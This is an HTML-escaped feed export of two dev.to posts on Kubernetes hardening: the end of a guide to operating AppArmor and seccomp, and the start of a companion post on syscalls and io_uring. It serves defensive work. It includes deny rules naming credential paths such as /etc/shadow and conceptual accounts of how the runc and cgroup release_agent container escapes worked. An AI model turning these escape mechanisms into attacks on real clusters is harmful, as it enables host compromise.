  Common Anti-Patterns
&lt;/h2&gt;

&lt;p&gt;These are the patterns that undermine AppArmor in production, across organizations that have done the work to deploy it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Treating &lt;code&gt;RuntimeDefault&lt;/code&gt; as "secure enough."&lt;/strong&gt; It's a reasonable baseline, but it's not a security posture. &lt;code&gt;RuntimeDefault&lt;/code&gt; does not restrict filesystem access, doesn't prevent reading &lt;code&gt;/proc/*/maps&lt;/code&gt;, and varies across runtimes. It's a starting point, not a destination.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Generating profiles from synthetic or short-observation traffic.&lt;/strong&gt; A profile generated from 30 minutes of staging traffic will miss weekly batch jobs, on-call runbook paths, slow-startup JVM behavior, and any probe interactions that didn't fire during the window. Observation windows must cover full operational cycles — including failure modes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Running security controls only in production.&lt;/strong&gt; Profiles validated only in production are profiles you can't roll back safely. Complain mode in staging, enforce in production, with CI comparison of denial delta between environments.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setting &lt;code&gt;Unconfined&lt;/code&gt; during incidents and not reverting.&lt;/strong&gt; This is the most common way security posture degrades silently. Every &lt;code&gt;Unconfined&lt;/code&gt; exception added under pressure is a permanent policy rollback unless tracked and scheduled for follow-up.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Not auditing profile drift.&lt;/strong&gt; Applications change. Profiles don't automatically change with them. An 18-month-old profile for a service that has been through three dependency upgrades is almost certainly wrong — either too permissive (allowing paths the app no longer needs) or insufficiently permissive (missing paths added in newer dependencies).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Alerting on absolute denial counts rather than deviation.&lt;/strong&gt; Some workloads produce steady, low-level denial noise from probe edge cases or library behavior. Alerting on any denial will exhaust on-call teams; alerting on zero denials misses real events. Baseline first, then alert on deviation.&lt;/p&gt;
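&lt;p&gt;One way to encode "deviation, not absolute counts" is a Prometheus rule that compares the current denial rate against its own trailing baseline. This is a sketch: &lt;code&gt;apparmor_denials_total&lt;/code&gt; is a hypothetical metric name, so substitute whatever counter your log pipeline actually exports.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;groups:
- name: apparmor-denials
  rules:
  - alert: AppArmorDenialSpike
    # fire when the 10m denial rate exceeds 3x its 7-day average
    expr: |
      rate(apparmor_denials_total[10m])
        &amp;gt; 3 * avg_over_time(rate(apparmor_denials_total[10m])[7d:1h])
    for: 15m
    labels:
      severity: warning
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;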





&lt;h2&gt;
  
  
  Platform Team Playbook
&lt;/h2&gt;

&lt;p&gt;If you operate Ubuntu-based Kubernetes nodes and are building or hardening your security posture, here's a concrete sequence. This isn't theory — it's the operational order that reduces the risk of each step breaking what the previous step protected.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuat7warqi4q5gz5i8jji.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuat7warqi4q5gz5i8jji.png" alt="image" width="298" height="2053"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A few implementation notes on the less obvious steps:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 before AppArmor&lt;/strong&gt;: Seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; is lower risk, higher portability, and easier to validate. Getting it in first means AppArmor is hardening a surface that's already narrowed. Don't try to do both simultaneously — sequence reduces blast radius.&lt;/p&gt;
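&lt;p&gt;For reference, step 1 is a single pod-level field. A minimal sketch (deployment and image names are illustrative):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp
spec:
  selector:
    matchLabels:
      app: myapp
  template:
    metadata:
      labels:
        app: myapp
    spec:
      # applies the runtime's default seccomp profile to every container
      securityContext:
        seccompProfile:
          type: RuntimeDefault
      containers:
      - name: app
        image: myapp:1.0   # illustrative
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;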

&lt;p&gt;&lt;strong&gt;Step 4 duration matters&lt;/strong&gt;: 48 hours is a minimum. If your workload has weekly batch jobs, cron patterns, or on-call runbooks that trigger unusual paths, you need observation windows that cover those cycles. A profile generated from one hour of traffic will miss them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 7 baselining&lt;/strong&gt;: Before you alert on denial spikes, you need to know what "normal" looks like. Some workloads legitimately produce periodic denials from probe edge cases or library behavior that's been allowed to be noisy. Baseline first, alert on deviation — not absolute counts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 8 is the one teams skip&lt;/strong&gt;: Profiles drift out of sync with applications as code changes. An overly permissive profile that hasn't been reviewed in 18 months is security debt. Treat profile review as part of your service's security hygiene, not a one-time setup task.&lt;/p&gt;





&lt;h2&gt;
  
  
  Designing for Control Failure
&lt;/h2&gt;

&lt;p&gt;In real systems, controls fail. Profiles drift. Runtimes change defaults. Exceptions get introduced under pressure and never revisited. The value of layering is not redundancy — it's &lt;strong&gt;graceful degradation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When reasoning about your security posture, think through each layer's failure mode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;If seccomp fails (missing profile, wrong defaults)
  → AppArmor still restricts filesystem and object access
  → Capabilities still bound privilege
  → NetworkPolicy still governs egress

If AppArmor fails (Unconfined exception, profile drift)
  → Seccomp still blocks high-risk syscall classes
  → readOnlyRootFilesystem still prevents write exploitation
  → Capabilities still block privileged operations

If both fail
  → Capabilities + PSS Restricted still constrain privilege
  → Detection (Falco/Tetragon) becomes your last active layer
  → NetworkPolicy still limits lateral movement
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This framing changes how you think about rollout decisions. A team that disables AppArmor under incident pressure hasn't removed one control — they've removed one layer of a degradation chain. The question is: which other layers are still in place, and are they configured to compensate?&lt;/p&gt;

&lt;p&gt;It also informs how you instrument for failure. Monitoring that seccomp is applied (via the pod's &lt;code&gt;securityContext&lt;/code&gt;) and AppArmor is loaded (via &lt;code&gt;aa-status&lt;/code&gt;) should be part of your cluster's security posture signals — not one-time setup validation.&lt;/p&gt;





&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;AppArmor's value comes from how you operate it, not that you've enabled it. Seccomp's value comes from the specificity of your profile, not the existence of one.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;RuntimeDefault&lt;/code&gt; for both is not a security posture — it's a starting point. RuntimeDefault seccomp blocks ~44 high-risk syscalls but doesn't cover newer attack surfaces like &lt;code&gt;io_uring&lt;/code&gt;. RuntimeDefault AppArmor is not a single well-defined thing; modern runtimes have converged but differences remain, and those differences matter in hardened environments.&lt;/p&gt;

&lt;p&gt;AppArmor has real blind spots: network exfiltration, in-memory attacks, kernel exploits, and path-based bypass via mount manipulation. Seccomp has its own: it cannot enforce path-level access control, cannot reason about what allowed syscalls operate on, and cannot make stateful policy decisions. These aren't reasons to skip either control — they're reasons to understand what you're actually enforcing and pair both with NetworkPolicy and runtime detection.&lt;/p&gt;

&lt;p&gt;Custom &lt;code&gt;Localhost&lt;/code&gt; AppArmor profiles managed declaratively via the Security Profiles Operator, combined with custom seccomp profiles scoped to actual workload behavior, are the only way to get a consistent, auditable posture at scale.&lt;/p&gt;
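&lt;p&gt;A minimal sketch of that pattern, assuming the Security Profiles Operator is installed (resource names are illustrative, and SPO field names can vary between releases, so check the version you run):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;# profile managed declaratively by SPO, distributed to every node
apiVersion: security-profiles-operator.x-k8s.io/v1alpha1
kind: AppArmorProfile
metadata:
  name: myapp-profile
spec:
  policy: |
    profile myapp-profile {
      /app/** r,
      /app/bin/server ix,
      /var/log/myapp/* w,
    }
---
# workload referencing it via the Kubernetes 1.30+ securityContext field
apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
  - name: app
    image: myapp:1.0   # illustrative
    securityContext:
      appArmorProfile:
        type: Localhost
        localhostProfile: myapp-profile
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;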

&lt;p&gt;On modern kernels with LSM stacking, AppArmor, BPF-LSM, and Landlock can coexist — enabling layered MAC enforcement that goes beyond any single module. eBPF-based systems like Tetragon express things AppArmor and seccomp cannot: dynamic, context-aware enforcement based on process ancestry and runtime state. These are complementary layers, not alternatives.&lt;/p&gt;

&lt;p&gt;When something goes wrong, AppArmor denial logs are among your highest-quality signals for distinguishing misconfiguration from intrusion. Build that triage path before you need it.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Real Purpose of AppArmor
&lt;/h2&gt;

&lt;p&gt;AppArmor's goal is not to stop every exploit. No single control does that.&lt;/p&gt;

&lt;p&gt;Its goal is to &lt;strong&gt;force attackers to cross more boundaries&lt;/strong&gt; — and to create high-fidelity signals when they try.&lt;/p&gt;

&lt;p&gt;A compromised container under a well-authored AppArmor profile cannot silently read credentials, probe &lt;code&gt;/proc&lt;/code&gt;, write to kernel interfaces, or move laterally via the filesystem. The attacker's options narrow, and each attempt they make is logged with enough context to tell you exactly what was tried.&lt;/p&gt;
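&lt;p&gt;As an illustration of what "narrow and logged" looks like in profile syntax, a fragment (not a complete profile, and the paths are hypothetical) might pair a tight allow list with explicit, audited denials:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;profile myapp {
  # allow only what the service demonstrably needs
  /app/** r,
  /app/bin/server ix,
  /var/log/myapp/* w,

  # explicit denies produce high-signal audit events when probed
  deny /proc/*/maps r,
  deny /proc/*/environ r,
  deny /sys/kernel/** w,
  audit deny /etc/shadow r,
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;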

&lt;p&gt;In modern Kubernetes platforms, AppArmor and seccomp are most valuable not as standalone controls, but as two layers in a deliberate architecture:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;What it restricts&lt;/th&gt;
&lt;th&gt;Enforcement point&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Seccomp&lt;/td&gt;
&lt;td&gt;Which syscalls the kernel will execute&lt;/td&gt;
&lt;td&gt;At syscall entry, before the handler runs (cBPF filter)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppArmor&lt;/td&gt;
&lt;td&gt;What objects permitted syscalls can access&lt;/td&gt;
&lt;td&gt;LSM hooks during kernel execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NetworkPolicy&lt;/td&gt;
&lt;td&gt;Where data can go&lt;/td&gt;
&lt;td&gt;iptables / eBPF dataplane&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime detection&lt;/td&gt;
&lt;td&gt;When behavior deviates from baseline&lt;/td&gt;
&lt;td&gt;eBPF observability (Falco, Tetragon)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;No single control is sufficient. The platform architecture is the control — and these two layers together make the attack surface explicit, auditable, and enforceable at both the syscall invocation and object access levels.&lt;/p&gt;

&lt;p&gt;One framing worth keeping: Kubernetes doesn't implement these controls — it orchestrates them. &lt;code&gt;securityContext&lt;/code&gt;, &lt;code&gt;appArmorProfile&lt;/code&gt;, and &lt;code&gt;seccompProfile&lt;/code&gt; are instructions to the Linux kernel. The real enforcement always happens below the Kubernetes abstraction layer, in the kernel's syscall path. Understanding that boundary is what prevents "we have AppArmor configured" from being confused with "we have AppArmor enforcing what we think it is."&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Security is not about stacking controls — it's about understanding where each control stops.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  If You Remember Only One Thing Per Control
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;What it doesn't do&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Seccomp&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reduces which syscalls the kernel will execute&lt;/td&gt;
&lt;td&gt;Cannot restrict what allowed syscalls operate on&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AppArmor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reduces which objects processes can access&lt;/td&gt;
&lt;td&gt;Cannot block syscall invocation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Capabilities&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reduces which privileged operations are allowed&lt;/td&gt;
&lt;td&gt;Neither path-aware nor syscall-surface aware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NetworkPolicy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Restricts where data can go&lt;/td&gt;
&lt;td&gt;No visibility into process behavior&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Runtime detection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Catches deviation from baseline behavior&lt;/td&gt;
&lt;td&gt;Detection, not prevention&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The table is also a checklist: if you can't articulate what each layer &lt;em&gt;doesn't&lt;/em&gt; cover, you're configuring controls, not designing a security posture.&lt;/p&gt;





&lt;h2&gt;
  
  
  Closing Thoughts
&lt;/h2&gt;

&lt;p&gt;The engineers who get this right aren't the ones who've read the most documentation. They're the ones who've been paged at 2am, watched a team disable AppArmor under pressure and never re-enable it, and learned the hard way that "we have security controls" and "we know what our security controls actually enforce" are different claims.&lt;/p&gt;

&lt;p&gt;AppArmor and seccomp are not hard to enable. They're hard to operate correctly over time — as applications change, nodes are replaced, sidecars are added, and profiles drift silently out of sync. The tooling exists to do this well: the Security Profiles Operator for lifecycle management, SPO's record mode for profile generation, SIEM integration for denial signals, and eBPF-based detection for the gaps neither control can fill.&lt;/p&gt;

&lt;p&gt;What separates a security posture from a compliance checkbox is whether you've thought through the failure modes — what happens when a profile is missing, when a runtime changes its defaults, when a team adds &lt;code&gt;Unconfined&lt;/code&gt; during an incident. That's the work. The YAML is the easy part.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;For a deeper understanding of the syscall mechanics that both controls rely on, see the companion post: &lt;a href="https://platformwale.blog/2026/03/18/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything/" rel="noopener noreferrer"&gt;Syscalls in Kubernetes: The Invisible Layer That Runs Everything&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;Originally Published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kernel</category>
      <category>linux</category>
      <category>kubernetes</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>Syscalls in Kubernetes: The Invisible Layer That Runs Everything</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Thu, 19 Mar 2026 01:47:04 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything-3f1p</link>
      <guid>https://dev.to/piyushjajoo/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything-3f1p</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Every abstraction in Kubernetes — containers, namespaces, cgroups, networking — eventually collapses into a syscall. If you want to reason seriously about security, observability, and performance at the platform level, you need to understand what's happening at this layer.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Problem With "Containers Are Isolated"&lt;/li&gt;
&lt;li&gt;What Is a Syscall, Really?&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;io_uring&lt;/code&gt; Problem&lt;/li&gt;
&lt;li&gt;The CPU Privilege Model&lt;/li&gt;
&lt;li&gt;Anatomy of a Syscall&lt;/li&gt;
&lt;li&gt;How Containers Change the Equation&lt;/li&gt;
&lt;li&gt;
The Kubernetes Security Stack — Layer by Layer

&lt;ul&gt;
&lt;li&gt;seccomp: Your Syscall Firewall&lt;/li&gt;
&lt;li&gt;Falco: Syscall-Level Runtime Detection&lt;/li&gt;
&lt;li&gt;eBPF: Programmable Kernel Hooks&lt;/li&gt;
&lt;li&gt;gVisor: The User-Space Kernel&lt;/li&gt;
&lt;li&gt;LSMs: Mandatory Access Controls&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Real-World Scenarios&lt;/li&gt;
&lt;li&gt;Performance Implications&lt;/li&gt;
&lt;li&gt;What a Staff Engineer Should Own&lt;/li&gt;
&lt;li&gt;Further Reading&lt;/li&gt;
&lt;/ol&gt;





&lt;h2&gt;
  
  
  The Problem With "Containers Are Isolated"
&lt;/h2&gt;

&lt;p&gt;When engineers first learn Kubernetes, they're told: &lt;em&gt;containers are namespaced processes&lt;/em&gt;. And that's mostly true — namespaces isolate PIDs, mount points, and network interfaces; cgroups constrain CPU and memory. The abstraction holds well enough.&lt;/p&gt;

&lt;p&gt;Until it doesn't.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In 2019, &lt;strong&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2019-5736" rel="noopener noreferrer"&gt;CVE-2019-5736&lt;/a&gt;&lt;/strong&gt; exploited a file-descriptor mishandling bug in &lt;code&gt;runc&lt;/code&gt;: a container process running as root could open &lt;code&gt;/proc/self/exe&lt;/code&gt;, which transparently resolves to the host's &lt;code&gt;runc&lt;/code&gt; binary via &lt;code&gt;procfs&lt;/code&gt; semantics — bypassing normal symlink sandboxing. The container could overwrite the &lt;code&gt;runc&lt;/code&gt; binary mid-execution and gain host root.&lt;/li&gt;
&lt;li&gt;In 2022, &lt;strong&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt;&lt;/strong&gt; found a missing capability check in the kernel's &lt;code&gt;cgroup_release_agent_write&lt;/code&gt; function — a container without &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; in the host namespace could create a new user namespace via &lt;code&gt;unshare&lt;/code&gt;, mount cgroupfs inside it, and write an arbitrary path to &lt;code&gt;release_agent&lt;/code&gt;. When the cgroup emptied, the kernel executed that path as root on the host.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both exploits were entirely syscall-driven — no memory corruption required. Crucially, both were &lt;em&gt;blocked by the Docker default seccomp profile and AppArmor&lt;/em&gt; — which is precisely why those defaults exist, and why disabling them on production workloads is so dangerous.&lt;/p&gt;

&lt;p&gt;The root cause in every container escape: &lt;strong&gt;containers share the host kernel&lt;/strong&gt;. And the kernel is reached exclusively through syscalls.&lt;/p&gt;

&lt;p&gt;If you're a platform or infrastructure engineer running multi-tenant Kubernetes, this isn't a security team problem. It's your problem. And it starts with understanding syscalls.&lt;/p&gt;





&lt;h2&gt;
  
  
  What Is a Syscall, Really?
&lt;/h2&gt;

&lt;p&gt;Your application — whether it's written in Go, Python, Java, or Rust — runs in &lt;strong&gt;user space&lt;/strong&gt;. It has no direct access to hardware, the filesystem, or the network. It cannot allocate physical memory. It cannot open a socket.&lt;/p&gt;

&lt;p&gt;To do any of these things, it must ask the kernel — and the only mechanism to do that is a &lt;strong&gt;system call (syscall)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Think of it like this: your application is a tenant in an apartment building. The kernel is the building manager who controls access to electricity, water, and the internet. The syscall is the intercom — the only way to request something from the manager.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8hnduowad1uui7zqwrfn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8hnduowad1uui7zqwrfn.png" alt="image" width="729" height="1548"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Linux exposes roughly &lt;strong&gt;450 syscalls on x86-64&lt;/strong&gt; as of modern 6.x kernels (kernel 5.4 had ~435; kernel 6.1 reached ~450; 6.8+ ~460). The count grows with each release as new interfaces like &lt;code&gt;io_uring&lt;/code&gt; and &lt;code&gt;landlock&lt;/code&gt; are added. The most commonly used in a typical web application: &lt;code&gt;read&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;, &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;close&lt;/code&gt;, &lt;code&gt;socket&lt;/code&gt;, &lt;code&gt;connect&lt;/code&gt;, &lt;code&gt;mmap&lt;/code&gt;, &lt;code&gt;clone&lt;/code&gt;, &lt;code&gt;execve&lt;/code&gt;, &lt;code&gt;exit&lt;/code&gt;. A typical containerized service uses fewer than 50 distinct syscalls in steady state.&lt;/p&gt;

&lt;p&gt;This matters enormously — because the ones you &lt;em&gt;don't&lt;/em&gt; need are your attack surface.&lt;/p&gt;
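&lt;p&gt;You can measure this for your own service. A hedged sketch using &lt;code&gt;strace&lt;/code&gt; (the process name is illustrative, and the window must cover representative traffic, not an idle period):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# attach to a running process tree and tally syscalls by name;
# detach with Ctrl-C to print the summary table
strace -f -c -p "$(pidof myapp)"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The number of distinct rows in that summary is, to a first approximation, the syscall allow list your workload actually needs.&lt;/p&gt;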





&lt;h2&gt;
  
  
  The &lt;code&gt;io_uring&lt;/code&gt; Problem
&lt;/h2&gt;

&lt;p&gt;Before getting into privilege rings and syscall mechanics, it's worth calling out the most significant shift in the Linux syscall surface of the past few years: &lt;strong&gt;&lt;code&gt;io_uring&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Introduced in Linux 5.1 (2019), &lt;code&gt;io_uring&lt;/code&gt; is an asynchronous I/O interface built around two ring buffers shared between user space and the kernel. The design goal was to eliminate the per-operation syscall overhead that makes high-throughput I/O expensive under KPTI (Kernel Page-Table Isolation). Instead of calling &lt;code&gt;read()&lt;/code&gt; or &lt;code&gt;write()&lt;/code&gt; per operation, applications submit batches of I/O requests by writing into the submission queue (SQ ring) and poll the completion queue (CQ ring) for results — all without a syscall per operation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgii9sv4j7q97xd2v5bbx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgii9sv4j7q97xd2v5bbx.png" alt="image" width="800" height="159"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The performance gains are real — &lt;code&gt;io_uring&lt;/code&gt; can drive storage and network I/O at significantly higher throughput than traditional syscall-per-operation patterns. But it introduced a massive new kernel attack surface.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Security Problem
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;io_uring&lt;/code&gt; operations execute in the kernel with elevated context. Because the interface is complex, stateful, and relatively new, it has been a prolific source of privilege escalation vulnerabilities:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41073" rel="noopener noreferrer"&gt;CVE-2021-41073&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;Type confusion in &lt;code&gt;io_uring&lt;/code&gt; leading to privilege escalation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2022-29582" rel="noopener noreferrer"&gt;CVE-2022-29582&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;Use-after-free in &lt;code&gt;io_uring&lt;/code&gt; — container escape&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-2598" rel="noopener noreferrer"&gt;CVE-2023-2598&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;Heap out-of-bounds write via &lt;code&gt;io_uring&lt;/code&gt; fixed buffers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each of these was reachable from an unprivileged container process. Because &lt;code&gt;io_uring&lt;/code&gt; isn't a single syscall but a &lt;em&gt;kernel subsystem&lt;/em&gt; accessed via three syscalls (&lt;code&gt;io_uring_setup&lt;/code&gt;, &lt;code&gt;io_uring_enter&lt;/code&gt;, &lt;code&gt;io_uring_register&lt;/code&gt;), the standard seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; profile does &lt;strong&gt;not&lt;/strong&gt; block it — it was introduced after the default profiles were designed.&lt;/p&gt;

&lt;h3&gt;
  
  
  What To Do
&lt;/h3&gt;

&lt;p&gt;Many hardened environments explicitly block &lt;code&gt;io_uring&lt;/code&gt; at the seccomp level:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"syscalls"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"io_uring_setup"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"io_uring_enter"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"io_uring_register"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ERRNO"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Google's own gVisor&lt;/strong&gt; disables &lt;code&gt;io_uring&lt;/code&gt; by default, and Docker's default seccomp profile has blocked the &lt;code&gt;io_uring&lt;/code&gt; syscalls since Docker 25. Several hardening guides and CIS benchmark discussions now explicitly recommend blocking &lt;code&gt;io_uring&lt;/code&gt; for workloads that don't require it.&lt;/p&gt;

